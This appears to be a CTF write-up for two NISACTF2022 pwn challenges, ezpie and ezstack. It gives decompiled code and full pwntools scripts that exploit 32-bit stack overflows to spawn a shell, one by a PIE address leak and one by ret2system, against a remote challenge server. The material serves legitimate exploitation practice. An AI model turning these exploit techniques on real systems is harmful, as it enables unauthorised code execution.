
pwn - write ups

2022-05-07 02:31:09



[NISACTF2022]ezpie

  • checksec
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
  • program output
    OHHH!,give you a gift!
    0x56573770
    Input:
  • main
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  puts("OHHH!,give you a gift!");
  printf("%p\n", main);
  puts("Input:");
  vuln();
  return 0;
}
  • vuln
ssize_t vuln()
{
  char buf; // [esp+0h] [ebp-28h]

  return read(0, &buf, 0x50u);
}

vuln() has a stack overflow: read() accepts 0x50 bytes into a buffer at ebp-0x28.

The program prints the runtime address of main.

The static address of main in the ELF is 0x770, so

main_addr = int(io.recvline(),16)
offset = main_addr - main_add

Receive the main address printed by the program and subtract the static address to get the PIE base offset.

  • shell
int shell()
{
  return system("/bin/sh");
}

Get the static address of shell

bin_sh = elf.sym['shell']

Add the offset to get bin_sh_final, the runtime address of shell

bin_sh_final = offset + bin_sh

Full exploit

from pwn import *
context(os = 'linux' , arch = 'i386' , log_level = 'debug')
content = 0
if content == 0:
    io = remote('124.221.24.137',28638)
else:
    io = process('')
def atk():
    elf = ELF('')
    # buffer at ebp-0x28 plus 4 bytes of saved ebp reaches the return address
    padlength = 0x28 +0x4
    bin_sh = elf.sym['shell']
    io.recvuntil(b'OHHH!,give you a gift!\n')
    # leaked runtime address of main
    main_addr = int(io.recvline(),16)
    success('[+]main_addr=' + hex(main_addr))
    # static address of main in the ELF (0x770); the difference is the PIE base
    main_add = elf.sym['main']
    offset = main_addr - main_add
    success('[+]offset=' + hex(offset))
    io.recvuntil(b'Input:\n')
    success('[+]bin_sh=' + hex(bin_sh))
    bin_sh_final = offset + bin_sh
    success('[+]bin_sh_final='+hex(bin_sh_final))
    # 32-bit binary: the return address is 4 bytes, so p32, not p64
    payload = b'a' * padlength + p32(bin_sh_final)
    io.sendline(payload)
    io.interactive()
atk()

[NISACTF2022]ezstack

  • main
int __cdecl main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0);
  setbuf(stdout, 0);
  shell();
  return 0;
}
  • shell
ssize_t shell()
{
  char buf; // [esp+0h] [ebp-48h]

  system("echo Welcome to NISACTF");
  return read(0, &buf, 0x60u);
}

shell() has a stack overflow: read() accepts 0x60 bytes into a buffer at ebp-0x48.

Full exploit

from pwn import *
elf = ELF('')
# io = process('')
io = remote('124.221.24.137',28760)
# buffer at ebp-0x48 plus 4 bytes of saved ebp reaches the return address
padlength = 0x48 + 0x4
bin_sh = next(elf.search(b'/bin/sh'))
system = elf.sym['system']
success('[+]bin_sh=' + hex(bin_sh))
success('[+]system=' + hex(system))
shell = elf.sym['shell']
success('[+]shell=' + hex(shell))
# returning into system(): the dword after the system address is the return
# address system() itself will use, and the argument follows it on the stack
payload = b'a' * padlength + p32(system) + p32(0xdeadbeef) + p32(bin_sh)
io.sendline(payload)
io.interactive()

Source: https://www.cnblogs.com/M1sceden4/p/16240907.html
